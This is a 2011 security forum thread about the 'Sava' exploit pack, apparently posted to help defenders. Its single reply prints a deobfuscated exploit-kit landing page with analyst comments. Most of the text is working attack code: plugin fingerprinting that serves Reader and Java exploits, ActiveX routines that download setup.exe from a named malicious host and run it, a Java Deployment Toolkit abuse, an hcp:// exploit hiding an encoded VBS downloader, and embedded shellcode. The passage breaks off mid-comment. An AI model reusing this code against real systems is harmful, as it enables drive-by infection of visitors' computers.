Author Topic: Sava Exploits Pack  (Read 4198 times)


June 15, 2011, 09:32:10 am

SysAdMini

Ruining the bad guy's day

September 03, 2011, 09:39:27 pm
Reply #1

SysAdMini

Deobfuscated code example:

Code: [Select]
<HTML><HEAD><title>.</title>
    <script type="text/javascript">
        function OnBeforeUnLoad () {
window.open("http://4.facebook-apps.me/panel/virtest.html","_blank","location=0,status=0,scrollbars=0, width=100%,height=100%")
            return "All data that you have entered will be lost!";
        }
    </script>
<script src="res://mshtml.dll/objectembed.js"></script>
<script language="javascript">
var objectSource = "http://4.facebook-apps.me/panel/load.php?spl=new_FF";
</script>
</head>
<body  onbeforeunload="return OnBeforeUnLoad ()" BGCOLOR="#000000" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form>
<center>
<SCRIPT language="JavaScript">
setTimeout("ObjectLoad()",3000);
</SCRIPT>
<center>
<br>
<object id="MediaPlayer1" CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95" codebase="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=5,1,52,701"
standby="Loading Microsoft Windows® Media Player components..." type="application/x-oleobject" width="280" height="256">
<param name="lola.wav">
<param name="animationatStart" value="true">
<param name="transparentatStart" value="true">
<param name="autoStart" value="true">
<param name="showControls" value="true">
<param name="Volume" value="-450">
<embed type="application/x-mplayer2" pluginspage="http://www.microsoft.com/Windows/MediaPlayer/" src="lola.wav" name="MediaPlayer1" width=1 height=1 autostart=1 showcontrols=1 volume=-450>
</object>
<br>
<center><table CELLPADDING=10 CELLSPACING=10><td BGCOLOR=yellow><font FACE="helvetica,arial,geneva"><H1><b>Free Porn Archive<b></H1> Complite last hour update ....
<script type="text/javascript">
// Analyst note: decoy "page load timer". This script only rewrites the text of
// the #endTime span every 100 ms; nothing here fetches or executes content.
var startTime=new Date();

// Writes the time elapsed since startTime, in tenths of a second, into #endTime.
function currentTime(){
  var a=Math.floor((new Date()-startTime)/100)/10;
  if (a%1==0) a+=".0"; // pad whole numbers so one decimal place is always shown
  document.getElementById("endTime").innerHTML=a;
}

// Stops the ticker when the load event fires (clearTimeout is called on an id
// that was created with setInterval).
window.onload=function(){
  clearTimeout(loopTime);
}
  document.write('This page took <span id="endTime">0.0</span> seconds to load.');
  var loopTime=setInterval("currentTime()",100);
</script></font></td>></table></center>

      <SCRIPT>
var PLAYER_URL='';
var PLAYER_VERSION='1';
var PLAYER_ID='1';
var THUMB_URL='http://4.facebook-apps.me/panel/clip_files/120110064808_4b4d0a389c3d3.jpg';
var PLAY_URL='';
var GET_URL='http://4.facebook-apps.me/panel/load.php?spl=Direcct_Player';
var FILENAME='';
var HIDE_FROM_WM=false;
var IS_WM_CHECK=false;
var WM_URL='http://google.com/';
</SCRIPT>

      <SCRIPT charset=UTF-8 src="http://4.facebook-apps.me/panel/1.js" tppabs="http://4.facebook-apps.me/panel/1.js"></SCRIPT>
</center>
<br>
<div id="carrot_onfocus" style="position:absolute;top:-5000;left:-50000;z-index:-50000">

<body>


</body>
<script type="text/javascript" src="PluginDetect.js"></script>
<script type="text/javascript">

// Analyst note: fingerprints the Adobe Reader plugin through the PluginDetect
// library. Returns {installed, version}; version stays the string '0' and
// installed stays false when PluginDetect.getVersion("AdobeReader") is null.
function acrobatCheck() {
var acrobat=new Object();
acrobat.installed=false;
acrobat.version='0';

var adobe = PluginDetect.getVersion("AdobeReader");
if(adobe!=null){
acrobat.installed=true;
// The comma-separated version is split and its first three fields are
// concatenated as strings, e.g. "9,3,0,0" -> "930" (constructed example).
var vArray = adobe.split(",");
acrobat.version = vArray[0] + vArray[1] + vArray[2];
}
return acrobat;
}

// Analyst note: fingerprints the Java plugin through PluginDetect, passing
// 'getJavaInfo.jar' as the second argument (a relative URL, so a request for
// that file from the kit directory is a likely network artefact - confirm in
// a capture). Returns {installed, version, build}; the defaults '0'/'0' are
// kept when getVersion() returns null.
function javaCheck() {
var ojava=new Object();
ojava.installed=false;
ojava.version='0';
ojava.build='0';

var javaversion = PluginDetect.getVersion('Java', 'getJavaInfo.jar')

if(javaversion!=null){
ojava.installed=true;
// Fields 1 and 3 of the comma-separated version string are kept as
// "version" and "build" (both remain strings).
var vArray = javaversion.split(",");
ojava.version = vArray[1];
ojava.build = vArray[3];
}
return ojava;
}

// Global queue of kit-relative URLs selected by the fingerprinting functions,
// and the index of the next queue entry to load.
var ExploitFrames = new Array();
var CurrentExploit = 0;

// Appends a 1x1 iframe pointing at about:blank to the document body.
// NOTE(review): the frame loads nothing remote; its purpose is not evident
// from this listing (possibly a leftover or placeholder) - confirm.
function VisitorCheck(){
var mydiv=document.createElement("div");
mydiv.innerHTML="<iframe src='about:blank' width='1' height='1'></iframe>";
document.body.appendChild(mydiv);
}

// Analyst note: loads the queued URLs one at a time. Each call injects a 1x1
// iframe whose src is ExploitFrames[CurrentExploit]; while entries remain it
// advances the index and re-schedules itself 3000 ms later. For detection this
// shows up as a series of tiny iframes requesting get.php?e=... from the same
// directory roughly three seconds apart.
function NextExploit(){

var mydiv=document.createElement("div");
mydiv.innerHTML="<iframe src='" + ExploitFrames[CurrentExploit] + "' width='1' height='1'></iframe>";
document.body.appendChild(mydiv);

if(CurrentExploit < ExploitFrames.length - 1){
CurrentExploit++;
setTimeout("NextExploit()", 3000);
}
}

// Analyst note: picks at most one PDF payload URL based on the Reader version
// digits returned by acrobatCheck() (a string, coerced to a number by the
// comparisons). Ranges handled: 700-710, 800-820, 900-930, 931-932, 933-939;
// any other version queues nothing. The e= labels look like CVE year-number
// pairs (2008-2992, 2010-0188, 2010-1297, 2010-2884) - presumably the CVE each
// served file targets; confirm against the files before attributing.
// Defensive takeaway: the upper bounds show which Reader builds the kit author
// considered no longer worth targeting with each payload.
function acrobatExploit(){
var acrobat = acrobatCheck();
if(acrobat.installed){
if(acrobat.version >= 800 && acrobat.version < 821){
ExploitFrames.push("get.php?e=Adobe-80-2010-0188");
}else if(acrobat.version >= 900 && acrobat.version < 940){
if(acrobat.version < 931){
ExploitFrames.push("get.php?e=Adobe-90-2010-0188");
}else if(acrobat.version < 933){
ExploitFrames.push("get.php?e=Adobe-2010-1297");

}else if(acrobat.version < 940){
ExploitFrames.push("get.php?e=Adobe-2010-2884");
}
}else if(acrobat.version >= 700 && acrobat.version < 711){
ExploitFrames.push("get.php?e=Adobe-2008-2992");
}
}
}
// Analyst note: queues the Java payload URL when the detected plugin reports
// version < 6, or version 6 with build < 19 (values come from javaCheck() as
// strings and are coerced by the comparisons). The e= label reads like a CVE
// year-number pair (2010-0842) - presumably the targeted CVE; confirm.
function javaExploit(){
var ojava = javaCheck();
if(ojava.installed){
if(ojava.version < 6 || (ojava.version == 6 && ojava.build < 19)){
ExploitFrames.push("get.php?e=Java-2010-0842");


}
}
}
// Analyst note: queues the "JavaSignedApplet" URL for every visitor with a
// Java plugin, with no version check at all. The label suggests a
// signed-applet trust prompt rather than a memory-corruption bug (inferred
// from the name only), so a fully patched Java would not by itself exclude
// this path.
function javaSigned(){
var ojava = javaCheck();
if(ojava.installed){
ExploitFrames.push("get.php?e=JavaSignedApplet");
}
}

// Execution order of this script: add the blank frame, queue a Java payload
// and a Reader payload according to the detected versions, queue the
// signed-applet URL whenever Java is present, then start loading the queue.
// NextExploit() is not called when nothing was queued.
VisitorCheck();

javaExploit();

acrobatExploit();

javaSigned();
if(ExploitFrames.length > 0){
NextExploit();
}

</script><iframe src="http://4.facebook-apps.me/panel/ifrAttacker.html" scrolling="no" frameborder="0" width="55px" height="55px"></iframe>
<iframe src="http://4.facebook-apps.me/panel/ifrLocal.html" scrolling="no" frameborder="1" width="55px" height="55px"></iframe>


<applet code='favort.siurele.class' archive='http://4.facebook-apps.me/panel/mndrtdsf.jar' width='300' height='150'><param name='assof' value='http://4.facebook-apps.me/panel/load.php?spl=mndrtdsf.jar'/></applet><applet codebase="file:C:\Program Files\java\jre6\lib\ext" width="750" height="400" code="http://3286924749/AppletX"><param name="eduzy" value="http://4.facebook-apps.me/panel/load.php?spl=jre6" /></applet>

<script type="text/javascript">
document.write("<style type='text/css'>.css {behavior: url(#default#userData);}</style><MARQUEE id='mrq' class='css'></MARQUEE><iframe src='about:blank' frameborder='0' width='1' height='1' id='helloin' name='helloin'></iframe></body>");
var NidUqyt = window;
document.write("<OBJECT id=Pdf1 height=0 width=0 classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></OBJECT>");
document.write("<object width='0' height='0' id='java_obj' classid='clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'><PARAM name='launchjnlp' value='1'><PARAM name='docbase' value='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#xc1;L4&#x7c;&#xec;&#x26;&#x11;y8vqc8&#xf2;&#xfe;e&#x3f;&#xcf;&#xad;&#x0f;4&#xa0;7&#x7c;&#x5e;&#xd0;4&#x7c;&#xea;05&#x7c;&#xac;&#x13;4&#x7c;&#xf8;&#x2e;7&#x7c;&#x10;&#x01;&#x04;&#x01;&#x01;&#x01;&#x01;&#x01;&#x01;&#x01;&#x01;&#x01;7Y4&#x7c;p&#xb1;8&#x7c;O&#x2f;7&#x7c;&#x27;44&#x7c;&#x90;Q&#x5f;&#xc3;&#x2b;&#xe7;4&#x7c;&#x5c;&#x3f;&#x7e;G&#x2a;9&#xf5;5&#xec;&#x0b;&#xf5;Zk&#xf4;6&#x1c;&#xc8;&#x03;5&#x7c;&#x0e;k4&#x7c;O&#x2f;7&#x7c;&#xc1;L4&#x7c;&#x60;&#xb1;8&#x7c;&#x5f;&#xaa;5&#x7c;&#x0b;i5&#x7c;&#x12;p&#x3f;&#xd2;&#x3f;64&#x7c;Q&#xce;t&#x1c;&#x3e;V&#x2c;&#xad;&#xc1;L4&#x7c;p&#xb1;8&#x7c;&#xea;05&#x7c;&#x5e;&#xd0;4&#x7c;&#xac;&#x13;4&#x7c;&#x3a;&#x1d;63AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#xeb;B&#x5f;&#xb9;&#xff;&#xff;&#xff;&#xff;&#x89;&#xfe;&#xb0;&#xff;&#xf2;&#xae;&#xfe;G&#xff;&#x89;&#xfb;&#xb0;&#xff;&#xf2;&#xae;&#xfe;G&#xff;&#x89;&#xfd;&#xf2;&#xae;&#xfe;G&#xff;&#xeb;t&#x60;1&#xc9;d&#x8b;q0&#x8b;v&#x0c;&#x8b;v&#x1c;&#x8b;&#x5e;&#x08;&#x8b;V&#x20;&#x8b;6f9J&#x18;u&#xf2;&#x89;&#x5c;&#x24;&#x1c;a&#xc3;&#xeb;&#x7c;&#x60;&#x8b;l&#x24;&#x24;&#x8b;E&#x3c;&#x8b;T&#x05;x&#x01;&#xea;&#x8b;J&#x18;&#x8b;Z&#x20;&#x01;&#xeb;&#xe3;7I&#x8b;4&#x8b;&#x01;&#xee;1&#xff;1&#xc0;&#xfc;&#xac;&#x84;&#xc0;t&#x0a;&#xc1;&#xcf;&#x0d;&#x01;&#xc7;&#xe9;&#xf1;&#xff;&#xff;&#xff;&#x3b;&#x7c;&#x24;&#x28;u&#xde;&#x8b;Z&#x24;&#x01;&#xeb;f&#x8b;&#x0c;K&#x8b;Z&#x1c;&#x01;&#xeb;&#x8b;&#x04;&#x8b;&#x01;&#xe8;&#x89;D&#x24;&#x1c;a&#xc3;&#xe8;&#x87;&#xff;&
#xff;&#xff;&#xba;&#x8e;N&#x0e;&#xec;RP&#xe8;&#x9e;&#xff;&#xff;&#xff;V&#xff;&#xd0;&#xba;6&#x1a;&#x2f;pRP&#xe8;&#x8f;&#xff;&#xff;&#xff;1&#xd2;RRSUR&#xff;&#xd0;&#xeb;&#x1a;&#xeb;&#x3d;&#xe8;Z&#xff;&#xff;&#xff;&#xba;&#x7e;&#xd8;&#xe2;sRP&#xe8;q&#xff;&#xff;&#xff;1&#xd2;R&#xff;&#xd0;&#xeb;i&#xe8;B&#xff;&#xff;&#xff;&#xba;&#x98;&#xfe;&#x8a;&#x0e;RP&#xe8;Y&#xff;&#xff;&#xff;1&#xd2;&#x81;&#xc2;&#xff;&#xff;&#xff;&#xff;&#x81;&#xea;&#xfa;&#xff;&#xff;&#xff;RS&#xff;&#xd0;&#xeb;&#xc3;&#xe8;&#xfc;&#xfe;&#xff;&#xff;urlmon&#x2e;dll&#xff;test&#x2e;exe&#xff;http&#x3a;&#x2f;&#x2f;muvie&#x2e;dyndns&#x2e;tv&#x2f;load&#x2e;php&#x3f;spl&#x3d;QQkEEkcJBQQEBAQG&#x26;p&#x3d;2&#xff;&#xcd;&#x03;'></object><embed type='application/x-java-applet' width='0' height='0' launchjnlp='1' docbase='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#xc1;L4&#x7c;&#xec;&#x26;&#x11;y8vqc8&#xf2;&#xfe;e&#x3f;&#xcf;&#xad;&#x0f;4&#xa0;7&#x7c;&#x5e;&#xd0;4&#x7c;&#xea;05&#x7c;&#xac;&#x13;4&#x7c;&#xf8;&#x2e;7&#x7c;&#x10;&#x01;&#x04;&#x01;&#x01;&#x01;&#x01;&#x01;&#x01;&#x01;&#x01;&#x01;7Y4&#x7c;p&#xb1;8&#x7c;O&#x2f;7&#x7c;&#x27;44&#x7c;&#x90;Q&#x5f;&#xc3;&#x2b;&#xe7;4&#x7c;&#x5c;&#x3f;&#x7e;G&#x2a;9&#xf5;5&#xec;&#x0b;&#xf5;Zk&#xf4;6&#x1c;&#xc8;&#x03;5&#x7c;&#x0e;k4&#x7c;O&#x2f;7&#x7c;&#xc1;L4&#x7c;&#x60;&#xb1;8&#x7c;&#x5f;&#xaa;5&#x7c;&#x0b;i5&#x7c;&#x12;p&#x3f;&#xd2;&#x3f;64&#x7c;Q&#xce;t&#x1c;&#x3e;V&#x2c;&#xad;&#xc1;L4&#x7c;p&#xb1;8&#x7c;&#xea;05&#x7c;&#x5e;&#xd0;4&#x7c;&#xac;&#x13;4&#x7c;&#x3a;&#x1d;63AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#xeb;B&#x5f;&#xb9;&#xff;&#xff;&#xff;&#xff;&#x89;&#xfe;&#xb0;&#xff;&#xf2;&#xae;&#xfe;G&#xff;&#x89;&#xfb;&#xb0;&#xff;&#xf2;&#xae;&#xfe;G&#xff;&#x89;&#
xfd;&#xf2;&#xae;&#xfe;G&#xff;&#xeb;t&#x60;1&#xc9;d&#x8b;q0&#x8b;v&#x0c;&#x8b;v&#x1c;&#x8b;&#x5e;&#x08;&#x8b;V&#x20;&#x8b;6f9J&#x18;u&#xf2;&#x89;&#x5c;&#x24;&#x1c;a&#xc3;&#xeb;&#x7c;&#x60;&#x8b;l&#x24;&#x24;&#x8b;E&#x3c;&#x8b;T&#x05;x&#x01;&#xea;&#x8b;J&#x18;&#x8b;Z&#x20;&#x01;&#xeb;&#xe3;7I&#x8b;4&#x8b;&#x01;&#xee;1&#xff;1&#xc0;&#xfc;&#xac;&#x84;&#xc0;t&#x0a;&#xc1;&#xcf;&#x0d;&#x01;&#xc7;&#xe9;&#xf1;&#xff;&#xff;&#xff;&#x3b;&#x7c;&#x24;&#x28;u&#xde;&#x8b;Z&#x24;&#x01;&#xeb;f&#x8b;&#x0c;K&#x8b;Z&#x1c;&#x01;&#xeb;&#x8b;&#x04;&#x8b;&#x01;&#xe8;&#x89;D&#x24;&#x1c;a&#xc3;&#xe8;&#x87;&#xff;&#xff;&#xff;&#xba;&#x8e;N&#x0e;&#xec;RP&#xe8;&#x9e;&#xff;&#xff;&#xff;V&#xff;&#xd0;&#xba;6&#x1a;&#x2f;pRP&#xe8;&#x8f;&#xff;&#xff;&#xff;1&#xd2;RRSUR&#xff;&#xd0;&#xeb;&#x1a;&#xeb;&#x3d;&#xe8;Z&#xff;&#xff;&#xff;&#xba;&#x7e;&#xd8;&#xe2;sRP&#xe8;q&#xff;&#xff;&#xff;1&#xd2;R&#xff;&#xd0;&#xeb;i&#xe8;B&#xff;&#xff;&#xff;&#xba;&#x98;&#xfe;&#x8a;&#x0e;RP&#xe8;Y&#xff;&#xff;&#xff;1&#xd2;&#x81;&#xc2;&#xff;&#xff;&#xff;&#xff;&#x81;&#xea;&#xfa;&#xff;&#xff;&#xff;RS&#xff;&#xd0;&#xeb;&#xc3;&#xe8;&#xfc;&#xfe;&#xff;&#xff;urlmon&#x2e;dll&#xff;test&#x2e;exe&#xff;http&#x3a;&#x2f;&#x2f;muvie&#x2e;dyndns&#x2e;tv&#x2f;load&#x2e;php&#x3f;spl&#x3d;QQkEE&#x26;p&#x3d;2&#xff;&#xcd;&#x03;' /></embed>");

// Analyst note: helper that tries to obtain the COM object named by `js`
// through the host object `nsu`. It walks six call shapes in order -
// CreateObject with one, two and three arguments, then GetObject with three
// argument layouts - swallowing every exception, and stops trying as soon as
// one call yields a truthy value. Returns that object, or null when every
// attempt failed.
// Detection hint: the fixed sequence of CreateObject/GetObject attempts with
// empty catch blocks is a stable pattern to match on, independent of the
// randomised identifier names.
function xkg(nsu, js) {
    var mawa = null;
    try {
        mawa = nsu.CreateObject(js)
    } catch (e) {}
    if (!mawa) {
        try {
            mawa = nsu.CreateObject(js, "")
        } catch (e) {}
    }
    if (!mawa) {
        try {
            mawa = nsu.CreateObject(js, "", "")
        } catch (e) {}
    }
    if (!mawa) {
        try {
            mawa = nsu.GetObject("", js)
        } catch (e) {}
    }
    if (!mawa) {
        try {
            mawa = nsu.GetObject(js, "")
        } catch (e) {}
    }
    if (!mawa) {
        try {
            mawa = nsu.GetObject(js)
        } catch (e) {}
    }
    return (mawa);
}
// Analyst note: download-and-execute stage. Given an ActiveX host object
// `sgw`, it
//   1. obtains Scripting.FileSystemObject, Shell.Application and ADODB.Stream,
//   2. builds the path <special folder 2>\setup.exe (2 is TemporaryFolder in
//      the FileSystemObject API),
//   3. fetches the `ha` URL with a synchronous GET, trying Microsoft.XMLHTTP,
//      MSXML2.XMLHTTP, MSXML2.ServerXMLHTTP and finally XMLHttpRequest,
//   4. writes the response body to that path through the stream and launches
//      it with ShellExecute.
// Returns 0 when no HTTP object could be opened, 1 after the launch call.
// `qbnp` and `rb` are assigned without `var`, so they leak into globals.
// Host-side indicators that follow from the code: the browser process writing
// setup.exe into the user's temp folder and that file being started by the
// browser; network-side: a GET for load.php with spl=ADODB.Stream.
function gr(sgw) {
    var ha = 'http://4.facebook-apps.me/panel/load.php?spl=ADODB.Stream';
    qbnp = "setup.exe";
    var dyv = sgw.CreateObject("Scripting.FileSystemObject", "");
    var sap = xkg(sgw, "Shell.Application");
    var ji = xkg(sgw, "ADODB.Stream");
    var sx = null;
    qbnp = dyv.BuildPath(dyv.GetSpecialFolder(2), qbnp);
    ji.Mode = 3; // ADODB.Stream mode 3: read/write
    // If xkg() returns null, the .open() call throws and control falls through
    // to the next HTTP object candidate.
    try {
        sx = xkg(sgw, "Microsoft.XMLHTTP");
        sx.open("GET", ha, false);
    } catch (e) {
        try {
            sx = xkg(sgw, "MSXML2.XMLHTTP");
            sx.open("GET", ha, false);
        } catch (e) {
            try {
                sx = xkg(sgw, "MSXML2.ServerXMLHTTP");
                sx.open("GET", ha, false);
            } catch (e) {
                try {
                    sx = new XMLHttpRequest();
                    sx.open("GET", ha, false);
                } catch (e) {
                    return 0;
                }
            }
        }
    }
    ji.Type = 1; // ADODB.Stream type 1: binary
    sx.send(null);
    rb = sx.responseBody;
    ji.Open();
    ji.Write(rb);
    ji.SaveTofile(qbnp, 2); // option 2: overwrite an existing file
    sap.ShellExecute(qbnp);
    return 1;
}
// Analyst note: first stage of the step0 -> step1 -> step2 -> step3 chain.
// Only user agents containing 'IE 6' are probed; everything else goes
// straight to step1(). For IE 6 it instantiates <object> elements for a
// null-terminated list of CLSIDs and checks, via xkg(), whether one of them
// will hand out Shell.Application. The first match is passed to gr() (download
// and run); step1() follows only when gr() reported success, and the function
// returns 1 either way. If no CLSID works it falls through to step1().
// NOTE(review): the first CLSID is the one commonly associated with the MDAC
// RDS.DataSpace control - verify the others before attributing. Kill bits for
// these CLSIDs are the relevant host-side mitigation.
function step0() {
    if (navigator.userAgent.indexOf('IE 6') == -1) {
        step1();
        return 0;
    }
    var pabl = 0;
    var lhqh = new Array('BD96C556-65A3-11D0-983A-00C04FC29E36', 'BD96C556-65A3-11D0-983A-00C04FC29E30', 'AB9BCEDD-EC7E-47E1-9322-D4A210617116', '0006F033-0000-0000-C000-000000000046', '0006F03A-0000-0000-C000-000000000046', '6e32070a-766d-4ee6-879c-dc1fa91d2fc3', '6414512B-B978-451D-A0D8-FCFDF33E833C', '7F5B7F63-F06F-4331-8A26-339E03C0AE3D', '06723E09-F4C2-43c8-8358-09FCD1DB0766', '639F725F-1B2D-4831-A9FD-874847682010', 'BA018599-1DB3-44f9-83B4-461454C84BF8', 'D0C07D56-7C69-43F1-B4A0-25F5A11FAB19', 'E8CCCDDF-CA28-496b-B050-6C07C962476B', null);
    while (lhqh[pabl]) {
        var sgw = null;
        sgw = document.createElement("object");
        sgw.setAttribute("classid", "clsid:" + lhqh[pabl]);
        if (sgw) {
            try {
                var hjh = xkg(sgw, "Shell.Application");
                if (hjh) {
                    if (gr(sgw)) step1();
                    return 1;
                }
            } catch (e) {}
        }
        pabl++;
    }
    step1();
}

// Analyst note: second stage - passes an argument string to launch() on the
// Java Deployment Toolkit object. In Internet Explorer it tries the control
// with CLSID CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA and, if that throws, CLSID
// 8AD9C840-044E-11D1-B3E9-00805F499D93; in other browsers it appends two
// <object> elements with the deployment-toolkit MIME types and tries each.
// The argument string carries "-J" options and a backslash path to a
// \webdav\ location on the kit host, so outbound WebDAV/SMB traffic to that
// host is a likely network indicator (inferred from the string - confirm).
// NOTE(review): as printed, the single backslashes inside the string literal
// would be consumed as JavaScript escapes; this looks like an artefact of the
// deobfuscation or forum rendering rather than the exact original bytes.
// step2() always runs afterwards, and runs twice when the outer try throws.
function step1() {
    try {
        var cg = "http: -J-jar -J\\4.facebook-apps.me\webdav\new.avi  http://4.facebook-apps.me/panel/load.php?spl=new_avi2 none";
        if (window.navigator.appName == 'Microsoft Internet Explorer') {
            try {
                var uiu = document.createElement('OBJECT');
                uiu.classid = 'clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA';
                uiu.launch(cg);
            } catch (e) {
                var ghtb = document.createElement('OBJECT');
                ghtb.classid = 'clsid:8AD9C840-044E-11D1-B3E9-00805F499D93';
                ghtb.launch(cg);
            }
        } else {
            var uiu = document.createElement('OBJECT');
            var ze = document.createElement('OBJECT');
            uiu.type = 'application/npruntime-scriptable-plugin;deploymenttoolkit';
            ze.type = 'application/java-deployment-toolkit';
            document.body.appendChild(uiu);
            document.body.appendChild(ze);
            try {
                uiu.launch(cg);
            } catch (e) {
                ze.launch(cg);
            }
        }
    } catch (e) {
        step2();
    };
    step2();
}

function step2() {
    try {
        var fn = "hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<scr" + "ipt defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,102,114,101,101,104,105,116,46,100,121,110,100,110,115,46,111,114,103,47,119,101,98,46,101,120,101,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));</scr" + "ipt>";
        var m = document.createElement("iframe");
        m.setAttribute("src", fn);
        m.setAttribute("width", 0);
        m.setAttribute("height", 0);
        m.setAttribute("frameborder", "0");
        document.body.appendChild(m);
    } catch (e) {
        step3();
    }
    step3();
}

// Helper: appends a borderless 300x200 iframe whose src is `fn` to the
// document body. Used by step3() to load the PDF-serving page.
function fghjdfgxbz(fn) {
    var p = document.createElement('iframe');
    p.setAttribute('src', fn);
    p.setAttribute('width', 300);
    p.setAttribute('height', 200);
    p.setAttribute('frameborder', '0');
    document.body.appendChild(p);
}

// Analyst note: final stage - loads npdf.php in an iframe. Firefox and Opera
// user agents get it directly. Other browsers first query the Pdf1 ActiveX
// object (the <OBJECT id=Pdf1> written earlier with document.write) for its
// component versions and parse the EScript and AcroForm entries.
// The version check is vestigial in this listing: both branches of
// `lv >= 800` load the same URL, and `sv` / `lvf` are computed but not used
// here. `lvf`, `sv` are implicit globals.
// If GetVersions() output lacks either entry, match() returns null and the
// [1] access throws; nothing in this function catches that.
function step3() {
    if ((navigator.userAgent.indexOf('Firefox')) != -1 || (navigator.userAgent.indexOf('Opera')) != -1) {
        fghjdfgxbz('http://4.facebook-apps.me/panel/npdf.php');
    } else {
        var lv = Pdf1.GetVersions();
        var fi = /EScript=([^,]+),/;
        var fif = /AcroForm=([^,]+),/;
        lvf = lv.match(fif)[1].split('.');
        lv = lv.match(fi)[1].split('.');
        sv = parseInt(lv[0]);
        lv = parseInt(lv.join(''));
        lvf = parseInt(lvf.join(''));
        if (lv >= 800) {
            fghjdfgxbz('http://4.facebook-apps.me/panel/npdf.php');
        } else {
            fghjdfgxbz('http://4.facebook-apps.me/panel/npdf.php');
        }
    }
}
step0();
</script>
<script type="text/javascript">
// Analyst note: entry of a second, unconditional chain (spl0 -> spl1 -> spl3
// -> spl4 -> spl6). Unlike the queue-based script, no plugin or browser check
// is made here. This stage writes a 1x1 <applet> (mario.jar, class
// search.parser) whose 'request' parameter carries a load.php URL, then
// continues with spl1().
function spl0() {
        document.write("<applet code='search.parser.class' archive='mario.jar' width='1' height='1'><param name='request' value='http://4.facebook-apps.me/panel/load.php?spl=search.parser'/></applet>");

    spl1()
}
// Appends a 1x1 iframe loading java_trust.php from the kit host, then
// continues with spl3().
function spl1() {
        var trifr = document.createElement('IFRAME');
        trifr.setAttribute('width', 1);
        trifr.setAttribute('height', 1);
        trifr.setAttribute('src', 'http://4.facebook-apps.me/panel/java_trust.php');
        document.body.appendChild(trifr)
    spl3()
}
// Appends a 1x1 iframe loading java_skyline.php from the kit host, then
// continues with spl4().
function spl3() {
        var slifr = document.createElement('IFRAME');
        slifr.setAttribute('width', 1);
        slifr.setAttribute('height', 1);
        slifr.setAttribute('src', 'http://4.facebook-apps.me/panel/java_skyline.php');
        document.body.appendChild(slifr)
    spl4()
}
// Analyst note: second copy of the ActiveX download-and-execute pattern,
// hard-wired to CLSID BD96C556-65A3-11D0-983A-00C04FC29E36. It asks that
// object for adodb.stream, Shell.Application and msxml2.XMLHTTP, fetches
// load.php?spl=XMLHTTP synchronously, saves the response body as the relative
